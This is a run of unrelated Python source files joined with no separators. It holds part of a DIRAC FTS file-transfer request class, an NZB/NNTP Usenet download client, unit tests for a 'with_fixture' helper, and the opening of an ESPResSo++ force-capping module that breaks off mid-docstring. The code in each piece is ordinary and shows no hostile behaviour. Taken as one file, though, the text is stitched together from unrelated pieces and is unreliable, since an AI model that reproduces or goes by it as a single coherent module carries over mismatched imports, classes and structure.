            self.__setFileParameter( lfn, 'Status', 'Failed' )

    self.sourceResolved = True
    return S_OK()

  def resolveTarget( self ):
    """ find target SE eligible for submission

    Computes a target SURL for every file not excluded from submission and
    removes pre-existing target files that would clash with the transfer.

    :param self: self reference
    """
    toResolve = [ lfn for lfn in self.fileDict
                 if self.fileDict[lfn].get( 'Status' ) not in self.noSubmitStatus ]
    if not toResolve:
      return S_OK()
    res = self.__updateReplicaCache( toResolve )
    if not res['OK']:
      return res
    for lfn in toResolve:
      res = returnSingleResult( self.oTargetSE.getURL( lfn, protocol = 'srm' ) )
      if not res['OK']:
        # BUGFIX: was res.get( 'Message', res['Message'] ) -- the default
        # argument was evaluated eagerly, so it could never guard against a
        # missing 'Message' key and only obscured the intent.
        reason = res['Message']
        gLogger.warn( "resolveTarget: skipping %s - %s" % ( lfn, reason ) )
        self.__setFileParameter( lfn, 'Reason', reason )
        self.__setFileParameter( lfn, 'Status', 'Failed' )
        continue

      res = self.setTargetSURL( lfn, res['Value'] )
      if not res['OK']:
        gLogger.warn( "resolveTarget: skipping %s - %s" % ( lfn, res["Message"] ) )
        self.__setFileParameter( lfn, 'Reason', res['Message'] )
        self.__setFileParameter( lfn, 'Status', 'Failed' )
        continue
    # keep only the files that actually got a target SURL
    toResolve = []
    for lfn in self.fileDict:
      if "Target" in self.fileDict[lfn]:
        toResolve.append( lfn )
    if not toResolve:
      return S_ERROR( "No eligible Target files" )
    res = self.oTargetSE.exists( toResolve )
    if not res['OK']:
      return S_ERROR( "Failed to check target existence" )
    for lfn, error in res['Value']['Failed'].items():
      self.__setFileParameter( lfn, 'Reason', error )
      self.__setFileParameter( lfn, 'Status', 'Failed' )
    toRemove = []
    for lfn, exists in res['Value']['Successful'].items():
      if exists:
        res = self.getSourceSURL( lfn )
        if not res['OK']:
          gLogger.warn( "resolveTarget: skipping %s - target exists" % lfn )
          self.__setFileParameter( lfn, 'Reason', "Target exists" )
          self.__setFileParameter( lfn, 'Status', 'Failed' )
        elif res['Value'] == self.fileDict[lfn]['Target']:
          gLogger.warn( "resolveTarget: skipping %s - source and target pfns are the same" % lfn )
          self.__setFileParameter( lfn, 'Reason', "Source and Target the same" )
          self.__setFileParameter( lfn, 'Status', 'Failed' )
        else:
          # existing target file is safe to replace
          toRemove.append( lfn )
    if toRemove:
      self.oTargetSE.removeFile( toRemove )
    return S_OK()

  def __filesToSubmit( self ):
    """
    check if there is at least one file to submit

    :return: S_OK if at least one file is present, S_ERROR otherwise
    """
    for fileInfo in self.fileDict.values():
      submittable = ( fileInfo.get( 'Status' ) not in self.noSubmitStatus
                      and fileInfo.get( 'Source' )
                      and fileInfo.get( 'Target' ) )
      if submittable:
        return S_OK()
    return S_ERROR()

  def __createFTSFiles( self ):
    """ create LFNs file for glite-transfer-submit command

    This file consists of one line for each file to be transferred:

    sourceSURL targetSURL [CHECKSUMTYPE:CHECKSUM]

    Builds one FTSFile object per submittable entry of fileDict, appends it
    to self.ftsFiles and counts it in self.submittedFiles.

    :param self: self reference
    """
    self.__updateMetadataCache()
    for lfn in self.fileDict:
      lfnStatus = self.fileDict[lfn].get( 'Status' )
      if lfnStatus not in self.noSubmitStatus:
        cksmStr = ""
        # # add chsmType:cksm only if cksmType is specified, else let FTS decide by itself
        if self.__cksmTest and self.__cksmType:
          checkSum = self.catalogMetadata.get( lfn, {} ).get( 'Checksum' )
          if checkSum:
            cksmStr = " %s:%s" % ( self.__cksmType, intAdlerToHex( hexAdlerToInt( checkSum ) ) )
        ftsFile = FTSFile()
        ftsFile.LFN = lfn
        ftsFile.SourceSURL = self.fileDict[lfn].get( 'Source' )
        ftsFile.TargetSURL = self.fileDict[lfn].get( 'Target' )
        ftsFile.SourceSE = self.sourceSE
        ftsFile.TargetSE = self.targetSE
        ftsFile.Status = self.fileDict[lfn].get( 'Status' )
        ftsFile.Checksum = cksmStr
        ftsFile.Size = self.catalogMetadata.get( lfn, {} ).get( 'Size' )
        self.ftsFiles.append( ftsFile )
        self.submittedFiles += 1
    return S_OK()

  def __createFTSJob( self, guid = None ):
    """ Build self.ftsJob from the accumulated FTS files.

    :param self: self reference
    :param str guid: when given, reuse an existing FTS job GUID
                     (e.g. to monitor an already submitted job)
    """
    # NOTE(review): the S_OK/S_ERROR result of __createFTSFiles is ignored here
    self.__createFTSFiles()
    ftsJob = FTSJob()
    ftsJob.RequestID = 0
    ftsJob.OperationID = 0
    ftsJob.SourceSE = self.sourceSE
    ftsJob.TargetSE = self.targetSE
    ftsJob.SourceToken = self.sourceToken
    ftsJob.TargetToken = self.targetToken
    ftsJob.FTSServer = self.ftsServer
    if guid:
      ftsJob.FTSGUID = guid

    for ftsFile in self.ftsFiles:
      # reset per-attempt state before attaching the file to the job
      ftsFile.Attempt += 1
      ftsFile.Error = ""
      ftsJob.addFile( ftsFile )
    self.ftsJob = ftsJob

  def __submitFTSTransfer( self ):
    """ create and execute glite-transfer-submit CLI command

    Submits self.ftsJob and marks all its files 'Submitted'.

    :param self: self reference
    :return: S_OK() on success, the submission S_ERROR otherwise
    """
    log = gLogger.getSubLogger( 'Submit' )
    self.__createFTSJob()

    submit = self.ftsJob.submitFTS2( command = self.submitCommand )
    if not submit["OK"]:
      log.error( "unable to submit FTSJob: %s" % submit["Message"] )
      return submit

    # was logged twice (before and after the loop) -- keep a single message
    log.info( "FTSJob '%s'@'%s' has been submitted" % ( self.ftsJob.FTSGUID, self.ftsJob.FTSServer ) )

    # # update statuses for job files
    for ftsFile in self.ftsJob:
      ftsFile.FTSGUID = self.ftsJob.FTSGUID
      ftsFile.Status = "Submitted"
      # NOTE(review): Attempt is also incremented in __createFTSJob, so each
      # submission bumps it twice -- confirm whether that is intended.
      ftsFile.Attempt += 1

    self.ftsGUID = self.ftsJob.FTSGUID
    return S_OK()

  def __resolveFTSServer( self ):
    """
    resolve FTS server to use, it should be the closest one from target SE

    Queries the FTS servers configured for each site hosting the target SE
    and keeps the first non-empty match in self.ftsServer.

    :param self: self reference
    :return: S_OK( ftsServer ) or S_ERROR
    """
    from DIRAC.ConfigurationSystem.Client.Helpers.Resources import getFTSServersForSites
    if not self.targetSE:
      return S_ERROR( "Target SE not set" )
    res = getSitesForSE( self.targetSE )
    if not res['OK'] or not res['Value']:
      return S_ERROR( "Could not determine target site" )
    targetSites = res['Value']

    targetSite = ''
    for targetSite in targetSites:
      targetFTS = getFTSServersForSites( [targetSite] )
      if targetFTS['OK']:
        ftsTarget = targetFTS['Value'][targetSite]
        if ftsTarget:
          self.ftsServer = ftsTarget
          return S_OK( self.ftsServer )
      else:
        # configuration lookup failed: propagate the error immediately
        return targetFTS
    # targetSite here is the last site tried (or '' when the list was empty)
    return S_ERROR( 'No FTS server found for %s' % targetSite )

  ####################################################################
  #
  #  Methods for monitoring
  #

  def summary( self, untilTerminal = False, printOutput = False ):
    """ summary of FTS job

    Polls the FTS job once, or -- when :untilTerminal: is set -- in a 1 s
    loop until the request reaches a terminal state, drawing a progress bar.

    :param self: self reference
    :param bool untilTerminal: flag to monitor FTS job to its final state
    :param bool printOutput: flag to print out monitoring information to the stdout
    """
    res = self.__isSummaryValid()
    if not res['OK']:
      return res
    while not self.isTerminal:
      res = self.__parseOutput( full = True )
      if not res['OK']:
        return res
      if untilTerminal:
        self.__print()
      # refreshes self.isTerminal from the current request status
      self.isRequestTerminal()
      # NOTE(review): __parseOutput returns plain S_OK(), whose 'Value' is
      # None, so the loop exit relies on isTerminal/untilTerminal -- confirm.
      if res['Value'] or ( not untilTerminal ):
        break
      time.sleep( 1 )
    if untilTerminal:
      print ""
    if printOutput and ( not untilTerminal ):
      return self.dumpSummary( printOutput = printOutput )
    return S_OK()

  def monitor( self, untilTerminal = False, printOutput = False, full = True ):
    """ monitor FTS job

    :param self: self reference
    :param bool untilTerminal: flag to monitor FTS job to its final state
    :param bool printOutput: flag to print out monitoring information to the stdout
    :param bool full: collect per-file information as well
    """
    if not self.ftsJob:
      # rebuild the FTSJob object, e.g. when monitoring a job submitted elsewhere
      self.resolveSource()
      self.__createFTSJob( self.ftsGUID )
    res = self.__isSummaryValid()
    if not res['OK']:
      return res
    if untilTerminal:
      res = self.summary( untilTerminal = untilTerminal, printOutput = printOutput )
      if not res['OK']:
        return res
    res = self.__parseOutput( full = full )
    if not res['OK']:
      return res
    if untilTerminal:
      self.finalize()
    if printOutput:
      self.dump()
    return res

  def dumpSummary( self, printOutput = False ):
    """ get FTS job summary as str

    :param self: self reference
    :param bool printOutput: print summary to stdout
    :return: S_OK( formatted summary string )
    """

    outStr = ''
    for status in sorted( self.statusSummary ):
      # skip states with a zero/empty counter
      if self.statusSummary[status]:
        outStr = '%s\t%-10s : %-10s\n' % ( outStr, status, str( self.statusSummary[status] ) )
    outStr = outStr.rstrip( '\n' )
    if printOutput:
      print outStr
    return S_OK( outStr )

  def __print( self ):
    """ Draw a progress bar of FTS job completeness on stdout (carriage
    return, no newline, so successive calls overwrite the same line).

    :param self: self reference
    """
    width = 100
    filled = int( ( width * self.percentageComplete ) / 100 )
    bar = "|%s>%s|" % ( "=" * filled, " " * ( width - filled ) )
    line = "%s %.1f%s %s %s" % ( bar, self.percentageComplete, "%",
                                 self.requestStatus, " " * 10 )
    sys.stdout.write( "%s\r" % ( line ) )
    sys.stdout.flush()

  def dump( self ):
    """ print FTS job parameters and files to stdout

    :param self: self reference
    :return: S_OK()
    """
    print "%-10s : %-10s" % ( "Status", self.requestStatus )
    print "%-10s : %-10s" % ( "Source", self.sourceSE )
    print "%-10s : %-10s" % ( "Target", self.targetSE )
    print "%-10s : %-128s" % ( "Server", self.ftsServer )
    print "%-10s : %-128s" % ( "GUID", self.ftsGUID )
    for lfn in sorted( self.fileDict ):
      print "\n  %-15s : %-128s" % ( 'LFN', lfn )
      for key in ['Source', 'Target', 'Status', 'Reason', 'Duration']:
        print "  %-15s : %-128s" % ( key, str( self.fileDict[lfn].get( key ) ) )
    return S_OK()

  def __isSummaryValid( self ):
    """ Check that the job can be monitored: both the FTS server and the
    FTS GUID must be known.

    :param self: self reference
    """
    for value, errMsg in ( ( self.ftsServer, "FTSServer not set" ),
                           ( self.ftsGUID, "FTSGUID not set" ) ):
      if not value:
        return S_ERROR( errMsg )
    return S_OK()

  def __parseOutput( self, full = False ):
    """ execute glite-transfer-status command and parse its output

    Mirrors the FTSJob state (completeness, status, submit time, per-file
    status/reason/duration) onto this request and its fileDict.

    :param self: self reference
    :param bool full: glite-transfer-status verbosity level, when set, collect information of files as well
    """
    monitor = self.ftsJob.monitorFTS2( command = self.monitorCommand, full = full )
    if not monitor['OK']:
      return monitor
    self.percentageComplete = self.ftsJob.Completeness
    self.requestStatus = self.ftsJob.Status
    self.submitTime = self.ftsJob.SubmitTime

    statusSummary = monitor['Value']
    if statusSummary:
      for state in statusSummary:
        self.statusSummary[state] = statusSummary[state]

    self.transferTime = 0
    for ftsFile in self.ftsJob:
      lfn = ftsFile.LFN
      self.__setFileParameter( lfn, 'Status', ftsFile.Status )
      self.__setFileParameter( lfn, 'Reason', ftsFile.Error )
      # NOTE(review): reaches into FTSFile's private _duration attribute
      self.__setFileParameter( lfn, 'Duration', ftsFile._duration )
      targetURL = self.__getFileParameter( lfn, 'Target' )
      if not targetURL['OK']:
        # target not recorded locally: backfill it from the FTS file
        self.__setFileParameter( lfn, 'Target', ftsFile.TargetSURL )
      self.transferTime += int( ftsFile._duration )
    return S_OK()

  ####################################################################
  #
  #  Methods for finalization
  #

  def finalize( self ):
    """ finalize FTS job

    Refreshes the metadata cache, registers the successfully transferred
    files in the catalog and sends an accounting record.

    :param self: self reference
    """
    self.__updateMetadataCache()
    transEndTime = dateTime()
    regStartTime = time.time()
    res = self.getTransferStatistics()
    # NOTE(review): res['OK'] is not checked before reading res['Value'];
    # getTransferStatistics currently always returns S_OK -- confirm.
    transDict = res['Value']

    res = self.__registerSuccessful( transDict['transLFNs'] )

    regSuc, regTotal = res['Value']
    regTime = time.time() - regStartTime
    if self.sourceSE and self.targetSE:
      self.__sendAccounting( regSuc, regTotal, regTime, transEndTime, transDict )
    return S_OK()

  def getTransferStatistics( self ):
    """ collect information of Transfers that can be used by Accounting

    :param self: self reference
    :return: S_OK( dict with transTotal / transLFNs / transOK / transSize )
    """
    transDict = { 'transTotal': len( self.fileDict ),
                  'transLFNs': [],
                  'transOK': 0,
                  'transSize': 0 }

    for lfn, fileInfo in self.fileDict.items():
      # count only successful transfers that actually took some time
      if fileInfo.get( 'Status' ) in self.successfulStates and fileInfo.get( 'Duration', 0 ):
        transDict['transLFNs'].append( lfn )
        transDict['transOK'] += 1
        if lfn in self.catalogMetadata:
          transDict['transSize'] += self.catalogMetadata[lfn].get( 'Size', 0 )

    return S_OK( transDict )

  def getFailedRegistrations( self ):
    """ get failed registrations dict

    :param self: self reference
    :return: S_OK( dict of lfn -> { 'PFN', 'SE' } filled by __registerSuccessful )
    """
    return S_OK( self.failedRegistrations )

  def __registerSuccessful( self, transLFNs ):
    """ register successfully transferred files to the catalogs,
    fill failedRegistrations dict for files that failed to register

    :param self: self reference
    :param list transLFNs: LFNs in FTS job
    :return: S_OK( ( nbRegistered, nbAttempted ) )
    """
    self.failedRegistrations = {}
    toRegister = {}
    for lfn in transLFNs:
      # NOTE(review): passes the Target SURL (not the LFN) to getURL --
      # presumably to resolve the registration PFN from the transfer SURL;
      # confirm against StorageElement.getURL semantics.
      res = returnSingleResult( self.oTargetSE.getURL( self.fileDict[lfn].get( 'Target' ), protocol = 'srm' ) )
      if not res['OK']:
        self.__setFileParameter( lfn, 'Reason', res['Message'] )
        self.__setFileParameter( lfn, 'Status', 'Failed' )
      else:
        toRegister[lfn] = { 'PFN' : res['Value'], 'SE' : self.targetSE }
    if not toRegister:
      return S_OK( ( 0, 0 ) )
    res = self.__getCatalogObject()
    if not res['OK']:
      # BUGFIX: was a "for lfn in toRegister:" loop that assigned, logged and
      # returned on its very first iteration -- the loop was pointless.
      self.failedRegistrations = toRegister
      self.log.error( 'Failed to get Catalog Object', res['Message'] )
      return S_OK( ( 0, len( toRegister ) ) )
    res = self.oCatalog.addReplica( toRegister )
    if not res['OK']:
      self.failedRegistrations = toRegister
      # BUGFIX: message was copy-pasted from the branch above and wrongly
      # said 'Failed to get Catalog Object'.
      self.log.error( 'Failed to add replicas', res['Message'] )
      return S_OK( ( 0, len( toRegister ) ) )
    for lfn, error in res['Value']['Failed'].items():
      self.failedRegistrations[lfn] = toRegister[lfn]
      self.log.error( 'Registration of Replica failed', '%s : %s' % ( lfn, str( error ) ) )
    return S_OK( ( len( res['Value']['Successful'] ), len( toRegister ) ) )

  def __sendAccounting( self, regSuc, regTotal, regTime, transEndTime, transDict ):
    """ Commit a DataOperation accounting record for this FTS job.

    :param self: self reference
    :param regSuc: number of files successfully registered
    :param regTotal: number of files attempted to register
    :param regTime: duration of the registration step
    :param transEndTime: time stamp at the end of FTS job
    :param dict transDict: counters for transferred files, sizes and successes
    """

    oAccounting = DataOperation()
    oAccounting.setEndTime( transEndTime )
    oAccounting.setStartTime( self.submitTime )

    # resolve the user owning the proxy; fall back to generic names
    result = getProxyInfo()
    userName = result['Value'].get( 'username', 'unknown' ) if result['OK'] else 'system'

    accountingDict = { 'OperationType' : 'replicateAndRegister',
                       'User' : userName,
                       'Protocol' : 'FTS3' if 'fts3' in self.ftsServer else 'FTS',
                       'RegistrationTime' : regTime,
                       'RegistrationOK' : regSuc,
                       'RegistrationTotal' : regTotal,
                       'TransferOK' : transDict['transOK'],
                       'TransferTotal' : transDict['transTotal'],
                       'TransferSize' : transDict['transSize'],
                       'FinalStatus' : self.requestStatus,
                       'Source' : self.sourceSE,
                       'Destination' : self.targetSE,
                       'TransferTime' : self.transferTime }
    oAccounting.setValuesFromDict( accountingDict )

    self.log.verbose( "Attempting to commit accounting message..." )
    oAccounting.commit()
    self.log.verbose( "...committed." )
    return S_OK()


import sys, os, urllib, time, socket, mt, ssl
from dlmanager.NZB import NZBParser
from dlmanager.NZB.nntplib2 import NNTP_SSL,NNTPError,NNTP, NNTPReplyError
from dlmanager.NZB.Decoder import ArticleDecoder

class StatusReport(object):
    """Mutable progress snapshot shared between the download/decode threads
    and whoever polls NZBClient.getStatus()."""

    def __init__(self):
        # Human-readable state of the download.
        self.message = "Downloading.."
        # Byte counters: total expected vs. decoded so far.
        self.total_bytes = 0
        self.current_bytes = 0
        # Terminal flags.
        self.completed = False
        self.error_occured = False
        # Bookkeeping for speed/ETA style displays.
        self.start_time = 0
        self.file_name = ""
        self.kbps = 0
        # File assembly progress (post-download phase).
        self.assembly = False
        self.assembly_percent = 0

class NZBClient():
    """Drive the download of a single NZB: one NNTPConnection thread per
    allowed connection fetches segments, an ArticleDecoder thread decodes
    and assembles them.  Segments flow: segment_queue -> cache -> decoded.
    Progress is exposed through a StatusReport (see getStatus())."""

    def __init__(self, nzbFile, save_to, nntpServer, nntpPort, nntpUser=None, nntpPassword=None, nntpSSL=False, nntpConnections=5, cache_path=""):
        # Settings
        self.save_to = save_to
        self.nntpServer = nntpServer
        self.nntpUser = nntpUser
        self.nntpPort = nntpPort
        self.nntpPassword = nntpPassword
        self.nntpSSL = nntpSSL
        self.nntpConnections = nntpConnections
        self.threads = []
        self.running = False

        # setup our cache folder.
        self.cache_path = cache_path
        if self.cache_path == "":
            self.cache_path = "packages/dlmanager/cache/"
        self.clearCache()

        # ensure both directories exist
        mt.utils.mkdir(self.save_to)
        mt.utils.mkdir(self.cache_path)

        # Open the NZB, get this show started.
        # NOTE(review): urllib.urlopen is Python 2 only, like the rest of
        # this module.
        realFile = urllib.urlopen(nzbFile)
        self.nzb = NZBParser.parse(realFile)
        self.all_decoded = False
        self.connection_count = 0

        # used to track status.
        self.status = StatusReport()
        self.status.file_name = nzbFile
        self.status.total_bytes = self.nzb.size

        # Segment tracking.
        self.cache = []              # downloaded, waiting to be decoded
        self.segment_list = []       # msgids of every segment in the NZB
        self.segments_finished = []  # msgids decoded successfully
        self.segments_aborted = []   # msgids given up on

        # Queues.
        self.segment_queue = []      # segments waiting for download
        self.failed_queue = []       # segments to retry

        # Used to track the speed.
        self.speedTime = 0
        self.speedCounter = 0

    def start(self):
        """Fill the download queue and launch all worker threads."""
        # keep track of running time.
        self.status.start_time = time.time()
        self.running = True

        # Generate a list of segments and build our queue.
        # (loop variable renamed: "file" shadowed the builtin)
        for nzb_file in self.nzb.files:
            for seg in nzb_file.segments:
                self.segment_list.append(seg.msgid)
                self.segment_queue.append(seg)

        # start the connections.
        for conn_num in range(0, self.nntpConnections):
            thread = NNTPConnection(conn_num,
                self.nntpServer,
                self.nntpPort,
                self.nntpUser,
                self.nntpPassword,
                self.nntpSSL,
                self.nextSeg,
                self.segComplete,
                self.segFailed,
                self.threadStopped)
            self.threads.append(thread)
            self.connection_count += 1
            thread.start()

        # start the article decoder.
        self.articleDecoder = ArticleDecoder(self.decodeNextSeg,
                self.save_to,
                self.cache_path,
                self.decodeFinished,
                self.decodeSuccess,
                self.decodeFailed,
                self.assemblyStatus)
        self.articleDecoder.start()

    def getStatus(self):
        """Return the shared StatusReport instance."""
        return self.status

    # Article Decoder - Next segment.
    def decodeNextSeg(self):
        """Hand the decoder the next downloaded segment.

        Returns a segment, None when the cache is momentarily empty, or -1
        as a kill signal (client stopped, or everything already decoded)."""
        # if we're not running send an instant kill switch.
        if not self.running: return -1

        # try to grab a segment from the cache to decode.
        seg = None
        try:
            seg = self.cache.pop()
        except IndexError:
            # was a bare "except:"; only an empty cache can raise here
            pass

        if seg is None and self.all_decoded:
            return -1
        return seg

    # Article Decoder - Decoded all segments.
    def decodeFinished(self):
        """Decoder callback: everything decoded and assembled."""
        self.status.completed = True

    # Article Decoder - Decode success.
    def decodeSuccess(self, seg):
        """Decoder callback: one segment decoded; update progress counters."""
        self.status.current_bytes += seg.size
        self.segments_finished.append(seg.msgid)
        if (len(self.segments_finished) + len(self.segments_aborted)) >= len(self.segment_list):
            self.all_decoded = True

    # Article Decoder - Decode failed.
    def decodeFailed(self, seg):
        """Decoder callback: decoding failed; requeue the segment."""
        if seg is None: return
        mt.log.debug("Segment failed to decode: " + seg.msgid)
        self.segFailed(seg)

    # Article Decoder - Assembly Status.
    def assemblyStatus(self, percent):
        """Decoder callback: file assembly progress (percentage)."""
        self.status.assembly = True
        self.status.assembly_percent = percent

    # NNTP Connection - Thread stopped.
    def threadStopped(self, thread_num):
        """Connection callback: one NNTP thread exited."""
        self.connection_count -= 1

    # NNTP Connection - Segment completed.
    def segComplete(self, seg):
        """Connection callback: segment downloaded; track speed and queue
        the segment for decoding."""
        if seg is None: return

        if seg.data:
            data_size = len("".join(seg.data))

            # Refresh the kbps figure roughly once a second.
            current_time = time.time()
            if (current_time - self.speedTime) > 1:
                self.status.kbps = self.speedCounter
                self.speedCounter = 0
                self.speedTime = current_time
            else:
                self.speedCounter += (data_size / 1024)

            self.cache.append(seg)

    # NNTP Connection - Download of segment failed.
    def segFailed(self, seg):
        """Connection callback: download failed; retry or abort the segment."""
        if seg is None: return

        if seg.aborted():
            mt.log.error("Segment Aborted: " + seg.msgid + " after " + str(seg.retries) + " attempts.")
            self.segments_aborted.append(seg.msgid)
            seg.data = []
            if (len(self.segments_finished) + len(self.segments_aborted)) >= len(self.segment_list):
                self.all_decoded = True
            return

        seg.retries += 1

        mt.log.error("Segment Failed: " + seg.msgid + " Attempt #" + str(seg.retries) + ".")
        self.failed_queue.append(seg)

    # NNTP Connection - Next Segment
    def nextSeg(self):
        """Hand a connection thread the next segment to download.

        Returns a segment, None when both queues are momentarily empty, or
        -1 as a kill signal (stopped, or empty queues with decoding done)."""
        # if we're not running send an instant kill switch.
        if not self.running: return -1

        # try to get a segment from main queue or failed queue.
        queue_empty = False
        seg = None
        try:
            seg = self.segment_queue.pop()
        except IndexError:
            # was bare "except:"s; pop on an empty list raises IndexError only
            try:
                seg = self.failed_queue.pop()
            except IndexError:
                queue_empty = True

        # We're all outta segments, if they're done decoding, kill the threads.
        if queue_empty and self.all_decoded:
            return -1

        return seg

    # empty the cache of any files.
    def clearCache(self):
        """Delete the on-disk segment cache directory."""
        mt.utils.rmdir(self.cache_path)

    def stop(self):
        """Stop every worker thread and wipe the on-disk cache."""
        self.running = False
        self.articleDecoder.stop()
        for thread in self.threads:
            thread.stop()
        self.clearCache()

class NNTPConnection(mt.threads.Thread):
    """A worker thread that downloads article bodies over one NNTP
    (optionally SSL) connection.

    Work items come from nextSegFunc; results are reported through the
    optional onSegComplete / onSegFailed / onThreadStop callbacks.
    """

    def __init__(self, connection_number, server, port, username, password, ssl, nextSegFunc, onSegComplete = None, onSegFailed = None, onThreadStop = None):
        mt.threads.Thread.__init__(self)

        # Settings
        self.connection = None                  # live NNTP/NNTP_SSL object, or None
        self.connection_number = connection_number  # identifies this thread in logs/callbacks
        self.server = server
        self.port = port
        self.username = username
        self.password = password
        self.ssl = ssl                          # truthy => connect with NNTP_SSL

        # Events.
        self.nextSegFunc = nextSegFunc          # returns a segment, None (wait) or -1 (stop)
        self.onSegComplete = onSegComplete
        self.onSegFailed = onSegFailed
        self.onThreadStop = onThreadStop

    def connect(self):
        """Open the NNTP connection; return True on success, False on failure."""
        # Open either an SSL or regular NNTP connection.
        try:
            if ( self.ssl ):
                self.connection = NNTP_SSL(self.server, self.port, self.username, self.password, False, True, timeout=15)
            else:
                self.connection = NNTP(self.server, self.port, self.username, self.password, False, True, timeout=15)
        except:
            # NOTE(review): bare except hides auth/network errors; failure is
            # reported only through the False return value below.
            pass

        if ( self.connection ): return True
        return False

    def disconnect(self):
        """Politely QUIT and drop the connection; safe to call repeatedly."""
        if ( self.connection ):
            try:
                self.connection.quit()
            except:
                # Connection may already be dead; we only care that it is gone.
                pass
        self.connection = None

    def run(self):
        """Main loop: connect, pull segments, download bodies, retry on error."""
        connection = None
        seg = None

        # Thread has started.
        mt.log.debug("Thread " + str(self.connection_number) + " started.")
        start_time = time.time()

        while(self.running):
            seg = None
            connected = self.connect()
            if ( connected ):
                while(self.running):
                    seg = self.nextSegFunc()

                    # Out of segments, sleep for a bit and see if we get anymore.
                    if ( seg == None ):
                        self.sleep(0.1)
                        continue

                    # Download complete, bail.
                    if ( seg == -1 ):
                        self.running = False
                        seg = None
                        break

                    # Attempt to grab a segment.
                    try:
                        # A BODY response code starting with "2" means success.
                        resp, nr, id, data = self.connection.body("<%s>" % seg.msgid)
                        if resp[0] == "2":
                            seg.data = data
                            if ( self.onSegComplete ): self.onSegComplete(seg)
                            seg = None

                    except ssl.SSLError:
                        # SSL trouble: break to the outer loop and reconnect.
                        break

                    except NNTPError as e:
                        mt.log.error("Error getting segment: " + e.response)
                        pass

                    except:
                        # NOTE(review): bare except; any other error is logged
                        # without detail and the segment is retried below.
                        mt.log.error("Error getting segment.")
                        pass

                    # Anything still held here failed; hand it back for retry.
                    if ( seg and self.onSegFailed ):
                        self.onSegFailed(seg)
                        seg = None

                # Disconnect when we're finished.
                if ( seg and self.onSegFailed ): self.onSegFailed(seg)
                self.disconnect()
            else:
                mt.log.error("Connection error. Reconnecting in 3 seconds.")
                self.sleep(3)

        # Thread has ended.
        self.disconnect() # just to be safe.
        end_time = time.time()
        mt.log.debug("Thread " + str(self.connection_number) + " stopped after " + str(end_time-start_time) + " seconds.")
        if ( self.onThreadStop ): self.onThreadStop(self.connection_number)

"""Tests for `fix.with_fixture`."""

from __future__ import with_statement

import os
import shutil
import tempfile

from types import FunctionType

from fix import with_fixture


def test_exists():
    """`fix.with_fixture` function exists"""
    is_plain_function = isinstance(with_fixture, FunctionType)
    assert is_plain_function


def test_setup_only():
    """`setup_only` fixture works as expected"""

    def setup_only(context):
        """A fixture with no `teardown()`."""

        def setup():
            """Add something to the context."""
            # The context starts empty and supports attribute assignment.
            assert context == {}
            context.squee = "kapow"

        # Returning a single callable registers it as setup only.
        return setup

    @with_fixture(setup_only)
    def case(context):
        """Check that the context has been set up."""
        assert context == {"squee": "kapow"}

    case()  # pylint: disable=E1120


def test_setup_teardown():
    """`setup_teardown` fixture works as expected"""

    def setup_teardown(context):
        """A fixture with both `setup()` and `teardown()`."""

        def setup():
            """Add something to the context."""
            assert context == {}
            context.squee = "kapow"

        def teardown():
            """Check that `context.squee` has changed."""
            # Runs after `case`, which rewrites squee to "boing".
            assert context == {"squee": "boing"}

        # Returning a (setup, teardown) pair registers both hooks.
        return setup, teardown

    @with_fixture(setup_teardown)
    def case(context):
        """Alter the context."""
        assert context == {"squee": "kapow"}
        context.squee = "boing"

    case()  # pylint: disable=E1120


def test_multiple_invocation():
    """`multiple` fixture creates a fresh context each invocation"""

    def multiple(context):
        """A fixture to be invoked multiple times."""

        def setup():
            """Add something to the context."""
            # Holds only if every invocation starts from an empty context.
            assert context == {}
            context.squee = "kapow"

        def teardown():
            """Check that `context.squee` has changed."""
            assert context == {"squee": "kapow", "boing": "thunk"}

        return setup, teardown

    @with_fixture(multiple)
    def case(context):
        """Add to the context."""
        assert context == {"squee": "kapow"}
        context.boing = "thunk"

    # Each of the three invocations must see a fresh, empty context.
    for _ in range(3):
        case()  # pylint: disable=E1120


def test_external():
    """`external` fixture interacts as expected with the 'real world'."""

    def external(context, files=3):
        """A fixture to manipulate temporary files and directories."""

        def setup():
            """Create some temporary files."""
            context.temp_dir = tempfile.mkdtemp()
            context.filenames = ["file_%03d" % n for n in range(files)]
            for name in context.filenames:
                path = os.path.join(context.temp_dir, name)
                with open(path, "w") as handle:
                    handle.write("This is the file %r.\n" % name)

        def teardown():
            """Delete the temporary files created in `setup()`."""
            shutil.rmtree(context.temp_dir)

        return setup, teardown

    @with_fixture(external, files=5)
    def check_files(context):
        """Return the number of present and absent files."""
        present = sum(
            1 for name in context.filenames
            if os.path.exists(os.path.join(context.temp_dir, name))
        )
        absent = len(context.filenames) - present
        return context.temp_dir, present, absent

    temp_dir, present, absent = check_files()  # pylint: disable=E1120
    assert not os.path.exists(temp_dir)
    assert present == 5
    assert absent == 0

#  Copyright (C) 2012,2013
#      Max Planck Institute for Polymer Research
#  Copyright (C) 2008,2009,2010,2011
#      Max-Planck-Institute for Polymer Research & Fraunhofer SCAI
#
#  This file is part of ESPResSo++.
#
#  ESPResSo++ is free software: you can redistribute it and/or modify
#  it under the terms of the GNU General Public License as published by
#  the Free Software Foundation, either version 3 of the License, or
#  (at your option) any later version.
#
#  ESPResSo++ is distributed in the hope that it will be useful,
#  but WITHOUT ANY WARRANTY; without even the implied warranty of
#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#  GNU General Public License for more details.
#
#  You should have received a copy of the GNU General Public License
#  along with this program.  If not, see <http://www.gnu.org/licenses/>.


r"""
******************************
espressopp.integrator.CapForce
******************************

This class can be used to forcecap all particles or a group of particles.
Force capping means that the force vector of a particle is rescaled
so that the length of the force vector is <= capforce

Example Usage:

>>> capforce     = espressopp.integrator.CapForce(system, 1000.0)
>>> integrator.addExtension(capforce)

CapForce can also be used to forcecap only a group of particles:

>>> particle_group = [45, 67, 89, 103]
>>> capforce       = espressopp.integrator.CapForce(system, 1000.0, particle_group)
>>> integrator.addExtension(capforce)

.. function:: espressopp.integrator.CapForce(system, capForce, particleGroup)

                :param system:
                :param capForce:
                :param particleGroup: (default: None)
                :type system:
                :type capForce:
                :type particleGroup:
"""

from espressopp.esutil import cxxinit
from espressopp import pmi
from espressopp.integrator.Extension import *
from _espressopp import integrator_CapForce

class CapForceLocal(ExtensionLocal, integrator_CapForce):
    """The (local) force-capping integrator extension.

    Rescales a particle's force vector whenever its magnitude exceeds the
    cap, either for all particles or only for a given particle group.
    """

    def __init__(self, system, capForce, particleGroup = None):
        """Initialize the C++ extension on workers in the active PMI group.

        :param system: the espressopp system object
        :param capForce: the maximum allowed force magnitude
